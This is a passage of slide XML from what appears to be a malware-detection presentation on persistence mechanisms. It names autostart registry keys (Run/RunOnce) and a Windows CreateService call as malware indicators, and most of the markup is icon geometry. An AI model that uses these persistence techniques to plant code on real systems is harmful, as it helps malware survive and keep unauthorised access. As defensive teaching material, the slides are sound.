          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477717" y="6810534"/>
            <a:ext cx="163322" cy="163322"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="163322" h="163322">
                <a:moveTo>
                  <a:pt x="81661" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="86350" y="0"/>
                  <a:pt x="90657" y="2584"/>
                  <a:pt x="92889" y="6699"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="161791" y="134294"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="163928" y="138250"/>
                  <a:pt x="163833" y="143034"/>
                  <a:pt x="161536" y="146894"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159239" y="150754"/>
                  <a:pt x="155060" y="153115"/>
                  <a:pt x="150563" y="153115"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12760" y="153115"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8262" y="153115"/>
                  <a:pt x="4115" y="150754"/>
                  <a:pt x="1786" y="146894"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-542" y="143034"/>
                  <a:pt x="-606" y="138250"/>
                  <a:pt x="1531" y="134294"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70433" y="6699"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="72666" y="2584"/>
                  <a:pt x="76972" y="0"/>
                  <a:pt x="81661" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="81661" y="53590"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="77419" y="53590"/>
                  <a:pt x="74005" y="57003"/>
                  <a:pt x="74005" y="61246"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="74005" y="96973"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="74005" y="101215"/>
                  <a:pt x="77419" y="104628"/>
                  <a:pt x="81661" y="104628"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85904" y="104628"/>
                  <a:pt x="89317" y="101215"/>
                  <a:pt x="89317" y="96973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="89317" y="61246"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="89317" y="57003"/>
                  <a:pt x="85904" y="53590"/>
                  <a:pt x="81661" y="53590"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="90178" y="122492"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="90372" y="119330"/>
                  <a:pt x="88795" y="116322"/>
                  <a:pt x="86085" y="114683"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83375" y="113044"/>
                  <a:pt x="79979" y="113044"/>
                  <a:pt x="77269" y="114683"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74559" y="116322"/>
                  <a:pt x="72982" y="119330"/>
                  <a:pt x="73176" y="122492"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="72982" y="125653"/>
                  <a:pt x="74559" y="128661"/>
                  <a:pt x="77269" y="130300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79979" y="131939"/>
                  <a:pt x="83375" y="131939"/>
                  <a:pt x="86085" y="130300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88795" y="128661"/>
                  <a:pt x="90372" y="125653"/>
                  <a:pt x="90178" y="122492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6" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="759448" y="6663545"/>
            <a:ext cx="7218840" cy="228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7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Detection Confidence: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1157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759448" y="6924860"/>
            <a:ext cx="7210674" cy="1959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9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injection sequences are strong malware indicators. Legitimate software rarely performs cross-process code execution.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7302" y="360032"/>
            <a:ext cx="65460" cy="523683"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="65460" h="523683">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="65460" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65460" y="523683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="523683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Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523683" y="327302"/>
            <a:ext cx="3313933" cy="196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b="1" kern="0" spc="103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Category 02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23683" y="589144"/>
            <a:ext cx="3395758" cy="32730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319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Persistence Mechanisms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23683" y="1047366"/>
            <a:ext cx="11414658" cy="229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Techniques that enable malware to survive system reboots and maintain long-term access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43667" y="1407399"/>
            <a:ext cx="7462486" cy="2094733"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7462486" h="2094733">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7462486" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7462486" y="2094733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2094733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343667" y="1407399"/>
            <a:ext cx="32730" cy="2094733"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32730" h="2094733">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32730" y="2094733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2094733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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490953" y="1538319"/>
            <a:ext cx="392762" cy="392762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="392762" h="392762">
                <a:moveTo>
                  <a:pt x="32729" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="360034" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="378109" y="0"/>
                  <a:pt x="392762" y="14653"/>
                  <a:pt x="392762" y="32729"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="392762" y="360034"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="392762" y="378109"/>
                  <a:pt x="378109" y="392762"/>
                  <a:pt x="360034" y="392762"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32729" y="392762"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14653" y="392762"/>
                  <a:pt x="0" y="378109"/>
                  <a:pt x="0" y="360034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32729"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14653"/>
                  <a:pt x="14653" y="0"/>
                  <a:pt x="32729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Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589144" y="1636510"/>
            <a:ext cx="196381" cy="196381"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="196381" h="196381">
                <a:moveTo>
                  <a:pt x="25276" y="87643"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="30378" y="51972"/>
                  <a:pt x="61101" y="24548"/>
                  <a:pt x="98191" y="24548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118519" y="24548"/>
                  <a:pt x="136930" y="32794"/>
                  <a:pt x="150278" y="46104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="150354" y="46180"/>
                  <a:pt x="150431" y="46257"/>
                  <a:pt x="150508" y="46334"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="153423" y="49095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135050" y="49095"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="128261" y="49095"/>
                  <a:pt x="122777" y="54580"/>
                  <a:pt x="122777" y="61369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122777" y="68158"/>
                  <a:pt x="128261" y="73643"/>
                  <a:pt x="135050" y="73643"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="184146" y="73643"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190935" y="73643"/>
                  <a:pt x="196420" y="68158"/>
                  <a:pt x="196420" y="61369"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="196420" y="12274"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="196420" y="5485"/>
                  <a:pt x="190935" y="0"/>
                  <a:pt x="184146" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177357" y="0"/>
                  <a:pt x="171872" y="5485"/>
                  <a:pt x="171872" y="12274"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="171872" y="32756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167538" y="28652"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="149779" y="10970"/>
                  <a:pt x="125231" y="0"/>
                  <a:pt x="98191" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48712" y="0"/>
                  <a:pt x="7786" y="36591"/>
                  <a:pt x="997" y="84191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="90903"/>
                  <a:pt x="4679" y="97117"/>
                  <a:pt x="11392" y="98076"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18104" y="99034"/>
                  <a:pt x="24318" y="94355"/>
                  <a:pt x="25276" y="87681"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="195384" y="112190"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="196343" y="105478"/>
                  <a:pt x="191663" y="99265"/>
                  <a:pt x="184990" y="98306"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178316" y="97347"/>
                  <a:pt x="172064" y="102026"/>
                  <a:pt x="171105" y="108700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="166003" y="144371"/>
                  <a:pt x="135281" y="171795"/>
                  <a:pt x="98191" y="171795"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77862" y="171795"/>
                  <a:pt x="59451" y="163549"/>
                  <a:pt x="46104" y="150239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46027" y="150163"/>
                  <a:pt x="45950" y="150086"/>
                  <a:pt x="45873" y="150009"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="42958" y="147248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61331" y="147248"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="68120" y="147248"/>
                  <a:pt x="73605" y="141763"/>
                  <a:pt x="73605" y="134974"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73605" y="128185"/>
                  <a:pt x="68120" y="122700"/>
                  <a:pt x="61331" y="122700"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12274" y="122738"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9014" y="122738"/>
                  <a:pt x="5868" y="124042"/>
                  <a:pt x="3567" y="126382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1266" y="128722"/>
                  <a:pt x="-38" y="131829"/>
                  <a:pt x="0" y="135127"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="384" y="183839"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="422" y="190628"/>
                  <a:pt x="5983" y="196074"/>
                  <a:pt x="12772" y="195998"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19561" y="195921"/>
                  <a:pt x="25008" y="190398"/>
                  <a:pt x="24931" y="183609"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="24778" y="163856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28882" y="167729"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="46641" y="185411"/>
                  <a:pt x="71150" y="196381"/>
                  <a:pt x="98191" y="196381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147669" y="196381"/>
                  <a:pt x="188595" y="159790"/>
                  <a:pt x="195384" y="112190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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014636" y="1538319"/>
            <a:ext cx="6742421" cy="229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9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Registry Modifications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14636" y="1832891"/>
            <a:ext cx="6660596" cy="1047366"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6660596" h="1047366">
                <a:moveTo>
                  <a:pt x="32730" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6627866" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6645942" y="0"/>
                  <a:pt x="6660596" y="14654"/>
                  <a:pt x="6660596" y="32730"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6660596" y="1014636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6660596" y="1032713"/>
                  <a:pt x="6645942" y="1047366"/>
                  <a:pt x="6627866" y="1047366"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32730" y="1047366"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14654" y="1047366"/>
                  <a:pt x="0" y="1032713"/>
                  <a:pt x="0" y="1014636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32730"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14666"/>
                  <a:pt x="14666" y="0"/>
                  <a:pt x="3273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10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112827" y="1931082"/>
            <a:ext cx="6521493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Autostart Registry Keys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112827" y="2127463"/>
            <a:ext cx="6521493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HKEY_LOCAL_MACHINE\Software\Microsoft\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12827" y="2291114"/>
            <a:ext cx="6521493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Windows\CurrentVersion\Run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12827" y="2454765"/>
            <a:ext cx="6521493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HKEY_CURRENT_USER\Software\Microsoft\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112827" y="2618416"/>
            <a:ext cx="6521493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Windows\CurrentVersion\RunOnce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14636" y="2978448"/>
            <a:ext cx="6726056" cy="3927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RegSetValue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1031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operations on Run/RunOnce keys enable automatic malware execution at user login, creating persistent infections.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43667" y="3633052"/>
            <a:ext cx="7462486" cy="1734701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7462486" h="1734701">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7462486" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7462486" y="1734701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1734701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Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="343667" y="3633052"/>
            <a:ext cx="32730" cy="1734701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32730" h="1734701">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32730" y="1734701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1734701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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490953" y="3763973"/>
            <a:ext cx="392762" cy="392762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="392762" h="392762">
                <a:moveTo>
                  <a:pt x="32729" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="360034" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="378109" y="0"/>
                  <a:pt x="392762" y="14653"/>
                  <a:pt x="392762" y="32729"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="392762" y="360034"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="392762" y="378109"/>
                  <a:pt x="378109" y="392762"/>
                  <a:pt x="360034" y="392762"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32729" y="392762"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14653" y="392762"/>
                  <a:pt x="0" y="378109"/>
                  <a:pt x="0" y="360034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32729"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14653"/>
                  <a:pt x="14653" y="0"/>
                  <a:pt x="32729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Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589144" y="3862164"/>
            <a:ext cx="196381" cy="196381"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="196381" h="196381">
                <a:moveTo>
                  <a:pt x="74832" y="3644"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="75983" y="-2033"/>
                  <a:pt x="81007" y="-6137"/>
                  <a:pt x="86837" y="-6137"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="109774" y="-6137"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="115604" y="-6137"/>
                  <a:pt x="120629" y="-2033"/>
                  <a:pt x="121779" y="3644"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127341" y="30493"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="132749" y="32794"/>
                  <a:pt x="137812" y="35748"/>
                  <a:pt x="142415" y="39238"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="168420" y="30608"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="173943" y="28767"/>
                  <a:pt x="180003" y="31068"/>
                  <a:pt x="182918" y="36131"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="194387" y="55999"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="197302" y="61062"/>
                  <a:pt x="196266" y="67429"/>
                  <a:pt x="191894" y="71303"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="171450" y="89484"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="171795" y="92322"/>
                  <a:pt x="171949" y="95237"/>
                  <a:pt x="171949" y="98191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171949" y="101144"/>
                  <a:pt x="171757" y="104059"/>
                  <a:pt x="171450" y="106897"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="191932" y="125116"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="196304" y="128990"/>
                  <a:pt x="197302" y="135396"/>
                  <a:pt x="194425" y="140420"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="182957" y="160288"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="180042" y="165313"/>
                  <a:pt x="173981" y="167653"/>
                  <a:pt x="168458" y="165812"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="142453" y="157182"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137812" y="160672"/>
                  <a:pt x="132749" y="163587"/>
                  <a:pt x="127379" y="165927"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="121856" y="192737"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="120667" y="198452"/>
                  <a:pt x="115642" y="202518"/>
                  <a:pt x="109851" y="202518"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="86914" y="202518"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="81084" y="202518"/>
                  <a:pt x="76059" y="198414"/>
                  <a:pt x="74909" y="192737"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="69385" y="165927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="63977" y="163625"/>
                  <a:pt x="58953" y="160672"/>
                  <a:pt x="54312" y="157182"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="28191" y="165812"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="22668" y="167653"/>
                  <a:pt x="16608" y="165351"/>
                  <a:pt x="13693" y="160288"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2225" y="140420"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-690" y="135357"/>
                  <a:pt x="345" y="128990"/>
                  <a:pt x="4718" y="125116"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="25200" y="106897"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="24854" y="104059"/>
                  <a:pt x="24701" y="101144"/>
                  <a:pt x="24701" y="98191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24701" y="95237"/>
                  <a:pt x="24893" y="92322"/>
                  <a:pt x="25200" y="89484"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4718" y="71265"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="345" y="67391"/>
                  <a:pt x="-652" y="60986"/>
                  <a:pt x="2225" y="55961"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13693" y="36093"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16608" y="31030"/>
                  <a:pt x="22668" y="28728"/>
                  <a:pt x="28191" y="30569"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="54197" y="39200"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="58838" y="35709"/>
                  <a:pt x="63901" y="32794"/>
                  <a:pt x="69270" y="30454"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="74832" y="3644"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="98306" y="128875"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109268" y="128834"/>
                  <a:pt x="119376" y="122948"/>
                  <a:pt x="124822" y="113433"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="130267" y="103919"/>
                  <a:pt x="130224" y="92222"/>
                  <a:pt x="124707" y="82749"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119190" y="73275"/>
                  <a:pt x="109038" y="67465"/>
                  <a:pt x="98076" y="67506"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="87113" y="67547"/>
                  <a:pt x="77005" y="73434"/>
                  <a:pt x="71559" y="82948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66114" y="92462"/>
                  <a:pt x="66158" y="104159"/>
                  <a:pt x="71675" y="113633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77191" y="123106"/>
                  <a:pt x="87343" y="128916"/>
                  <a:pt x="98306" y="128875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Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014636" y="3763973"/>
            <a:ext cx="6742421" cy="229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9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Service Creation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014636" y="4058545"/>
            <a:ext cx="6660596" cy="883715"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6660596" h="883715">
                <a:moveTo>
                  <a:pt x="32733" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6627863" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6645941" y="0"/>
                  <a:pt x="6660596" y="14655"/>
                  <a:pt x="6660596" y="32733"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6660596" y="850983"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6660596" y="869060"/>
                  <a:pt x="6645941" y="883715"/>
                  <a:pt x="6627863" y="883715"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="32733" y="883715"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14655" y="883715"/>
                  <a:pt x="0" y="869060"/>
                  <a:pt x="0" y="850983"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="32733"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14655"/>
                  <a:pt x="14655" y="0"/>
                  <a:pt x="32733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Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112827" y="4156736"/>
            <a:ext cx="6521493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Windows Service Installation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112827" y="4353117"/>
            <a:ext cx="6521493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CreateService(hSCManager,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12827" y="4516768"/>
            <a:ext cx="6521493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lpServiceName, lpDisplayName,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1112827" y="4680419"/>
            <a:ext cx="6521493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SERVICE_AUTO_START, ...);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1014636" y="5040451"/>
            <a:ext cx="6726056" cy="196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CreateService </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1031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installs malware as a Windows service, ensuring automatic startup with system-level privileges.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7951598" y="1407399"/>
            <a:ext cx="3911259" cy="1963812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3911259" h="1963812">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3911259" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3911259" y="1963812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1963812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0" name="Shape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7951598" y="1407399"/>
            <a:ext cx="32730" cy="1963812"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="32730" h="1963812">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="32730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32730" y="1963812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1963812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Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8098884" y="1538319"/>
            <a:ext cx="392762" cy="392762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="392762" h="392762">
                <a:moveTo>
                  <a:pt x="32729" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="360034" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="378109" y="0"/>
                  <a:pt x="392762" y="14653"/>
                  <a:pt x="392762" y="32729"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="392762" y="360034"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="392762" y="378109"/>
                  <a:pt x="378109" y="392762"/>
                  <a:pt x="360034" y="392762"/>
